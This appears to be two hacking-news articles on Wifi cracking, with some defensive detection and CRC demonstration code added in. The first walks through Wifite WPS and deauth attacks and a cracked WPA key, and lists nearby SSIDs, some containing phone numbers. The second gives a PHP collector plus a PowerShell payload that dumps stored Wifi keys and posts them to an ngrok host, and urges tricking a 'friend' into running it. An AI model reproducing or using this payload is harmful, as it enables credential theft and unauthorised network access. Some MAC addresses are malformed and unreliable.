Different Ways for Wifi Cracking
https://www.securitynewspaper.com/2021/07/24/different-ways-for-wifi-cracking/
Sat, 24 Jul 2021 14:20:00 +0000

The post Different Ways for Wifi Cracking appeared first on Information Security Newspaper | Hacking News.

Wireless Networks

A wireless network enables end-point devices to communicate with the internet by connecting to an access point (AP) device. Wireless devices are also referred to as WLAN devices.

Accessing Wireless Networks

You will need wireless-enabled devices such as smartphones, laptops or tablets to connect to wireless networks. Today most devices come with wireless networking. To connect to a wireless network, go to the Wifi settings on your mobile or laptop and tap on one of the listed Wifi networks. If the WLAN asks for a password, enter it. If the wireless network is open, simply connect to it.

Wireless Authentication

There are various types of wireless authentication. According to an ethical hacking researcher of the International Institute of Cyber Security, these authentication methods are used to protect Wifi networks from attackers. The main ones are WEP, WPA, WPA2 and WPS.

WEP (Wired Equivalent Privacy)

WEP was developed as part of the IEEE 802.11 WLAN standards. WEP was developed to provide security equal to that of wired networks. WEP encrypts data transmitted over the network to keep a WEP-enabled network safe from attackers.

WEP Authentication

  • WEP provides two types of authentication:
    • Open System Authentication (OSA) – This method grants access to a station requesting authentication, based on the configured policy.
    • Shared Key Authentication (SKA) – With this method, an encrypted challenge is sent to the station requesting access. The station encrypts the challenge with its key and responds. If the encrypted challenge matches the AP value, then access is granted.

WEP Security Flaw

  • Integrity Checked Using CRC (Cyclic Redundancy Check) – The CRC32 integrity check can be compromised by capturing at least two packets. The attacker can modify the bits in the encrypted stream and the checksum so that the packet is accepted by the authentication system, which leads to unauthorised access to the network.
  • WEP uses RC4 Encryption using Stream Ciphers – Stream ciphers are made up of an initial value (IV) and a secret key. The initial value is 24 bits long, while the secret key can be either 40 bits or 104 bits long. The short initial value and secret key make it easy to crack. Weak initial value combinations do not encrypt sufficiently, which makes WEP more vulnerable to attack.
  • WEP is based on Password – In WEP, key management is poorly implemented. Changing keys on large networks is challenging because WEP does not provide a centralized key management system. Initial values can be reused, which helps in cracking WEP authentication.
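Why a CRC32 checksum under a stream cipher gives no integrity, as an added example that is not from the original article: a constructed WEP-style frame body is changed without the key and still passes the ICV check, while the same change is rejected once a keyed MAC replaces the CRC. The IV, key, message and the HMAC-SHA256 variant are assumptions made for illustration; the HMAC variant is not the mechanism WPA uses.

```python
import hashlib
import hmac
import struct
import zlib

def rc4(key, data):
    """RC4 key scheduling followed by keystream XOR (encrypts and decrypts)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

def wep_seal(iv, key, plaintext):
    """WEP-style body: RC4 keyed with IV || key over plaintext || CRC32 ICV."""
    return rc4(iv + key, plaintext + struct.pack("<I", zlib.crc32(plaintext)))

def wep_open(iv, key, body):
    """Return the plaintext if the CRC32 ICV matches, otherwise None."""
    clear = rc4(iv + key, body)
    data, icv = clear[:-4], clear[-4:]
    return data if struct.pack("<I", zlib.crc32(data)) == icv else None

def xor_into(body, delta, fix_icv):
    """XOR `delta` into a sealed body without the key. CRC32 is affine over
    XOR, so the ICV change that matches `delta` is computable key-free."""
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta))) if fix_icv else 0
    patch = delta + struct.pack("<I", icv_delta)
    return bytes(a ^ b for a, b in zip(body, patch)) + body[len(patch):]

def mac_seal(iv, key, plaintext):
    """Same cipher, but a keyed MAC over IV and ciphertext replaces the CRC."""
    ct = rc4(iv + key, plaintext)
    return ct + hmac.new(key, iv + ct, hashlib.sha256).digest()

def mac_open(iv, key, body):
    ct, tag = body[:-32], body[-32:]
    good = hmac.new(key, iv + ct, hashlib.sha256).digest()
    return rc4(iv + key, ct) if hmac.compare_digest(tag, good) else None

# Constructed 24-bit IV, 40-bit key and message, for illustration only.
IV, KEY, MSG = b"\x01\x02\x03", b"\x0a\x0b\x0c\x0d\x0e", b"door=locked"
DELTA = bytes(a ^ b for a, b in zip(MSG, b"door=opened"))
```

The CRC catches a random bit error but not a change made together with the matching ICV adjustment; the keyed MAC rejects both.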

WPA

WPA is a security authentication standard which is widely used by many organizations. WPA was developed by the Wi-Fi Alliance in response to the security flaws in WEP. WPA encrypts data on 802.11 WLANs. It uses a longer initial value of 48 bits, whereas WEP uses 24 bits. WPA also uses temporal keys to encrypt packets.

WPA Security Flaw

  • WPA is vulnerable to denial of service attacks. This authentication uses pre-shared keys, which use passphrases. Weak passphrases are mostly vulnerable to dictionary attacks.

Cracking Wifi passwords is very popular among pentesters and researchers. Earlier we have shown many methods to crack Wifi passwords. Cracking into networks has a long history. Newer authentication methods have arrived to secure Wifi access points, yet many routers still fail to provide adequate security. Today we will show popular methods of Wifi cracking. Other tools, such as hashcat, are mostly used in dictionary and brute-force attacks.

Below you will see other methods for Wifi cracking, both automated and manual.

Cain & Abel

Cain & Abel is the most popular software used in various activities. It is a password recovery tool used for recovering different types of passwords. It can recover passwords through methods such as network packet sniffing, cracking different hashes, dictionary attacks and brute force.

  • Above you can see the stored Windows passwords recovered through Cain & Abel.

Wifite

Wifite automates Wifi cracking. You don't have to enter each command for capturing the handshake or de-authenticating clients. After starting, Wifite scans for the available Wifi networks. You then select the target by its number. After the target is selected, Wifite automatically captures the handshake and de-auths the clients connected to the AP. This tool makes Wifi cracking easy. You can also check out other methods for Wifi cracking.

  • For testing we have used Kali Linux 2019.1 amd64. Type git clone https://github.com/derv82/wifite2.git
  • Type cd wifite2/
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/derv82/wifite2.git
 Cloning into 'wifite2'…
 remote: Enumerating objects: 1934, done.
 remote: Total 1934 (delta 0), reused 0 (delta 0), pack-reused 1934
 Receiving objects: 100% (1934/1934), 1.09 MiB | 869.00 KiB/s, done.
 Resolving deltas: 100% (1413/1413), done.
root@kali:/home/iicybersecurity/Downloads# cd wifite2/
  • Type ls and then type python Wifite.py
  • This tool uses an inbuilt wordlist, wordlist-top4800-probable.txt. You can add more keywords according to your requirements for cracking the Wifi password.
root@kali:/home/iicybersecurity/Downloads/wifite2# ls
 bin         EVILTWIN.md  MANIFEST.in  README.md    setup.cfg  tests    wifite     wordlist-top4800-probable.txt
 Dockerfile  LICENSE      PMKID.md     runtests.sh  setup.py   TODO.md  Wifite.py
 root@kali:/home/iicybersecurity/Downloads/wifite2# python Wifite.py
   .               .
 .´  ·  .     .  ·  `.  wifite 2.2.5
 :  :  :  (¯)  :  :  :  automated wireless auditor
 `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
   `     /¯¯¯\     ´


 [+] Using wlan0mon already in monitor mode

   NUM                      ESSID   CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  ---  ----  -----  ----  ------
     1              geek_connect    11   WPA   42db   yes    1
     2         Pankaj@9212458712     1   WPA   31db   yes
     3               hidden_user     2   WPA   29db    no    3
     4                 DIRECT-hn     6   WPA   28db   yes
     5       (22:15:00:33:44:78)    11   WPA   27db   yes
     6                    naidus     6   WPA   27db    no
     7                   Excitel     6   WPA   22db    no
     8                       Cbi    10   WPA   21db   yes    1
     9       (34:12:24:67:4D:YK)     6   WPA   21db   yes
    10              Worldview@37     1   WPA   20db    no
    11               Excitel@43      7   WPA   16db    no
    12        Worldview@tanpreet    13   WPA   13db    no
    13                     Bunty     4   WPA   12db    no
    14              MohanLalchug    10   WPA   11db  lock
    15                  S.K.Tuli    11   WPA   10db    no
    16       (55:RF:B5:23:C5:90)     1   WPA    8db    no
    17       Rajat@wvc9312408388     1   WPA    7db    no
  • Press Ctrl+C
  • Enter the desired target. Here we will type 1
[+] select target(s) (1-17) separated by commas, dashes or all: 1
 + Starting attacks against C8:D7:79:50:C1:B3 (geek_connect)
  [+] geek_connect (51db) WPS Pixie-Dust: [--1s] Failed: Timeout after 300 seconds
  [+] geek_connect (50db) WPS PIN Attack: 4m55s PINs:1 Sending EAPOL (Timeouts:25, Fails:1)
  [+] geek_connect (51db) WPS PIN Attack: 5m2s PINs:1 Sending EAPOL (Timeouts:25, Fails:1)
  [+] geek_connect (46db) WPS PIN Attack: 5m3s PINs:1 Sending EAPOL (Timeouts:25, Fails:1)
  [+] geek_connect (46db) WPS PIN Attack: 5m3s PINs:1 Sending EAPOL (Timeouts:25, Fails:1)
 [+] geek_connect (47db) WPS PIN Attack: 5m5s PINs:1 Sending EAPOL (Timeouts:26, Fails:1) ^C
  [!] Interrupted
 [+] 2 attack(s) remain
  • Press Ctrl + C to skip the WPS attack. This tool cracks WPA2/WPA and WPS passwords. Currently we are testing on WPA2.
  • So we will press Ctrl + C
 [+] Do you want to continue attacking, or exit (C, e)? c  
 [+] geek_connect (42db) PMKID CAPTURE: Failed to capture PMKID
 [+] geek_connect (47db) WPA Handshake capture: Discovered new client: TU:QB:RT:46:AS:QW
 [+] geek_connect (47db) WPA Handshake capture: Discovered new client: 70:AF:EE:3Y:VB:MN
  [+] geek_connect (48db) WPA Handshake capture: Captured handshake
  [+] saving copy of handshake to hs/handshake_geekconnect_ 23:67:WW:EE:C1:WR _2019-09-14T06-50-06.cap saved
 [+] analysis of captured handshake file:
  [!]   tshark: .cap file does not contain a valid handshake
  [+]    pyrit: .cap file contains a valid handshake for  23:67:WW:EE:C1:WR  (geek_connect)
  [+] cowpatty: .cap file contains a valid handshake for (geek_connect)
  [!] aircrack: .cap file does not contain a valid handshake
 [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-top4800-probable.txt wordlist
  [+] Cracking WPA Handshake: 97.67% ETA: 0s @ 2156.9kps (current key: fantasy1)
  [+] Cracked WPA Handshake PSK: rootuser
 [+]   Access Point Name: geek_connect
  [+]  Access Point BSSID: 23:67:WW:EE:C1:WR
  [+]          Encryption: WPA
  [+]      Handshake File: hs/handshake_geekconnect_ 23:67:WW:EE:C1:WR _2019-09-14T06-50-06.cap
  [+]      PSK (password): rootuser
  [+] saved crack result to cracked.txt (1 total)
  [+] Finished attacking 1 target(s), exiting 
  • Above you can see the password which has been cracked using the Wifite tool. This tool consumes attacker time.
  • After gathering the password, an attacker can use session hijacking methods to spread malware.
———————————————————SNIP—————————————————
  • Wifite saves the .cap file in the Wifite directory. You can also use the .cap file for cracking the Wifi password directly with aircrack-ng, explained below.
root@kali:/home/iicybersecurity/Downloads/wifite2/hs# ls
 handshake_geekconnect_C8-D7-79-50-C1-B3_2019-09-14T06-50-06.cap
  • Opening the above file in Wireshark shows the EAPOL packet transmission.

Another Way of Wifi Cracking

Aircrack-ng

Aircrack-ng is the most popular technique, often taught in many ethical hacking courses and widely used in Wifi cracking. Aircrack-ng captures the handshake and de-auths the selected clients which are connected to the target BSSID. Then aircrack-ng uses a wordlist for cracking the password of the AP. This method mainly involves capturing the handshake, and the attack depends on de-authenticating clients. The attack is most commonly used in public places. Aircrack-ng comes pre-installed with many Linux distros.
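How the de-auth and handshake capture described above looks from the monitoring side, as an added example that is not from the original article: it flags a burst of deauthentication frames aimed at one client and counts the EAPOL frames that follow. The MAC addresses, frame records and thresholds are constructed assumptions.

```python
from collections import defaultdict, deque

# Constructed MAC addresses and capture summary: (seconds, frame kind, BSSID, client).
# "deauth" stands for 802.11 management frames of subtype 12, "eapol" for
# the handshake frames exchanged when a client reconnects.
AP, CLIENT_A, CLIENT_B = "02:00:00:00:00:01", "02:00:00:00:00:0a", "02:00:00:00:00:0b"
FRAMES = (
    [(1.0, "deauth", AP, CLIENT_B)]                                  # ordinary disconnect
    + [(10.0 + 0.1 * i, "deauth", AP, CLIENT_A) for i in range(20)]  # burst
    + [(13.0 + 0.05 * i, "eapol", AP, CLIENT_A) for i in range(4)]   # re-handshake
)

def find_forced_reauth(frames, window=5.0, threshold=10, follow=10.0):
    """Flag (BSSID, client) pairs that get `threshold` or more deauth frames
    within `window` seconds, and count EAPOL frames seen up to `follow`
    seconds after the burst (a reconnect that an observer could record)."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, kind, bssid, client in sorted(frames):
        pair = (bssid, client)
        if kind == "deauth":
            seen = recent[pair]
            seen.append(ts)
            while ts - seen[0] > window:      # drop frames outside the window
                seen.popleft()
            if len(seen) >= threshold:
                alert = alerts.setdefault(pair, {"peak": 0, "last": ts, "eapol_after": 0})
                alert["peak"] = max(alert["peak"], len(seen))
                alert["last"] = ts
        elif kind == "eapol" and pair in alerts:
            if ts - alerts[pair]["last"] <= follow:
                alerts[pair]["eapol_after"] += 1
    return alerts
```

Where the AP and clients support it, enabling 802.11w Protected Management Frames makes spoofed deauthentication frames ineffective.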

Hack Wifi Without Rooting Android Devices
https://www.securitynewspaper.com/2019/09/09/hack-wifi-without-rooting-android-devices/
Mon, 09 Sep 2019 13:21:48 +0000

The post Hack Wifi Without Rooting Android Devices appeared first on Information Security Newspaper | Hacking News.

Aircrack-ng is the most popular way of hacking Wifi passwords. But this method takes a long time for hijacking the password, as it uses a large wordlist for cracking the AP passwords. This method also needs a rooted Android device with Kali installed. We will show you a method to hack Wifi passwords without rooting the Android device, with a single command line.

We will use the UserLand application, which allows installing Kali Linux on Android devices without rooting. Aircrack-ng will not work in UserLand as it requires root access to the device.

So here we will start a PHP server on the hacker's mobile, and ngrok is used for forwarding. We will then create a payload to execute on the VICTIM Windows OS.

ON HACKER MOBILE

  • For testing we will use a Xiaomi Redmi Note 4. You have to install:
    • UserLand – https://play.google.com/store/apps/details?id=tech.ula&hl=en_IN
    • ConnectBot – https://play.google.com/store/apps/details?id=org.connectbot&hl=en_IN
  • These applications will be used to gather Wifi Password.
  • As per the ethical hacking researcher of International Institute of Cyber Security, UserLand will allow us to install different Linux distros on mobile. So here we will install Kali Linux and connect to it with ConnectBot.
  • Click on Kali Linux and enter the password iicybersecurity@12345. You can choose any password.
  • Type su && sudo apt-get update && sudo apt-get install net-tools
  • Type sudo apt-get install unzip && apt-mark build apache*
  • Then type sudo apt-get install php && sudo apt-get install screen
  • Type screen then again type screen

  • Type mkdir phpServer && type cd phpServer
  • Type nano index.php and enter the code below.
<html>
 <title> PHP Server </title>
  <body>
  <h1> It works!</h1>
  <?php
  $file = date("y-h-m") . ".credz" ;
  file_put_contents ($file , file_get_contents("php://input"));
  ?>
  </body>
</html>
  • Type php -S 0.0.0.0:80 &
  • Type ps -ef to check whether php is running or not.
  • Go to https://dashboard.ngrok.com/signup and create a new account. Then log in to your account, go to Auth and copy the auth token.
  • Type sudo apt-get install wget && type wget https://bin.equinox.io/a/nmkK3DkqZEB/ngrok-2.2.8-linux-arm64.zip
  • Now type unzip ngrok-2.2.8-linux-arm64.zip, this will extract ngrok file in the same directory.
  • Type ./ngrok authtoken <Your authtoken>
  • Type screen
  • Then type ./ngrok http 80
  • Now to run this ngrok in background press key combination of Ctrl+a+n, this will move the ngrok command in background and return to the shell prompt.
  • According to the ethical hacking researcher of International Institute of Cyber Security, this key combination can change depending on the mobile model.

  • Save the code below with a .bat extension. For that you can use the WPS Office application to save the bat file. Download the WPS Office application: https://play.google.com/store/apps/details?id=cn.wps.moffice_eng&hl=en
  • Open the application, click on + and then click on Document. Paste the code below into the WPS Office document editor. Save the file as payload.txt
  • Open the file manager. Rename the file from payload.txt to payload.bat
Add-Type -AssemblyName System.Web;

$ngrokServer = "https://SUBDOMAIN.ngrok.io/index.php";

foreach ($path in [System.IO.Directory]::EnumerateFiles("C:\ProgramData\Microsoft\Wlansvc\Profiles","*.xml","AllDirectories")) {

  try {
    $oXml = New-Object System.XML.XMLDocument;
    $oXml.Load($path);
    $ssid = $oXml.WLANProfile.SSIDConfig.SSID.Name;
    $netinfo = netsh.exe wlan show profiles name="$ssid" key=clear;
    $pass = (($netinfo | Select-String -Pattern "Key Content") -split ":")[1].Trim();
    $sendData += "SSID: " + ($ssid) + "`n" + "PASSWORD: " + ($pass) + "`n`n";
  } catch {}

}

Invoke-WebRequest -Uri $ngrokServer -Method 'POST' -Body $sendData;
  • Now use any social engineering trick to send this payload to your friend. Once your friend opens the payload on a Windows computer (the VICTIM machine), it runs. The code above is PowerShell code which, when run in PowerShell, will extract all the passwords on the VICTIM system.
  • As commented by a digital forensics expert of International Institute of Cyber Security, the same code is used in some malware with PowerShell to get all the passwords of the VICTIM system.

  • You will get all the stored Wifi passwords on your Android device.
  • Above you can see all the stored Wifi passwords in the /home/iicybersecurity/phpServer/ directory.
  • For more information on other ways to hack Wifi passwords, please follow this YouTube link.
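Detection logic for the behaviour of the payload above, as an added example that is not from the original article: it flags hosts where netsh prints stored Wifi profiles with key=clear and raises the severity when a lookup of the tunnel domain follows shortly after. The event schema, host names, timestamps and the five-minute window are constructed assumptions; in practice the fields would come from process-creation and DNS logging.

```python
import re
from datetime import datetime, timedelta

# netsh printing a stored profile together with its clear-text key.
KEY_DUMP = re.compile(r'netsh(\.exe)?"?\s+wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear', re.I)
# Tunnel domain taken from the article; extend the pattern for your environment.
TUNNEL = re.compile(r"(^|\.)ngrok\.io$", re.I)

# Constructed events in a simplified, hypothetical schema (not a real log format).
EVENTS = [
    {"time": "2021-07-24T10:00:01", "host": "WS-01", "type": "process",
     "cmd": 'netsh.exe wlan show profiles name="HomeNet" key=clear'},
    {"time": "2021-07-24T10:00:02", "host": "WS-01", "type": "process",
     "cmd": 'netsh.exe wlan show profiles name="Office" key=clear'},
    {"time": "2021-07-24T10:00:03", "host": "WS-01", "type": "dns",
     "query": "SUBDOMAIN.ngrok.io"},
    {"time": "2021-07-24T11:30:00", "host": "WS-02", "type": "process",
     "cmd": "netsh wlan show profiles"},                      # listing only
    {"time": "2021-07-24T12:00:00", "host": "WS-03", "type": "dns",
     "query": "SUBDOMAIN.ngrok.io"},                          # tunnel use only
]

def detect(events, window=timedelta(minutes=5)):
    """Per host: count key dumps and note a tunnel lookup that follows one
    within `window`. Both together rate "high", a key dump alone "medium"."""
    alerts = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        ts, host = datetime.fromisoformat(ev["time"]), ev["host"]
        if ev["type"] == "process" and KEY_DUMP.search(ev["cmd"]):
            alert = alerts.setdefault(host, {"key_dumps": 0, "tunnel": None})
            alert["key_dumps"] += 1
            alert["last"] = ts
        elif ev["type"] == "dns" and TUNNEL.search(ev["query"]):
            alert = alerts.get(host)
            if alert and ts - alert["last"] <= window:
                alert["tunnel"] = ev["query"]
    for alert in alerts.values():
        alert["severity"] = "high" if alert["tunnel"] else "medium"
    return alerts
```

A run of key=clear queries across several profiles within seconds, as the payload's loop produces, is itself unusual on a workstation even without the tunnel lookup.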
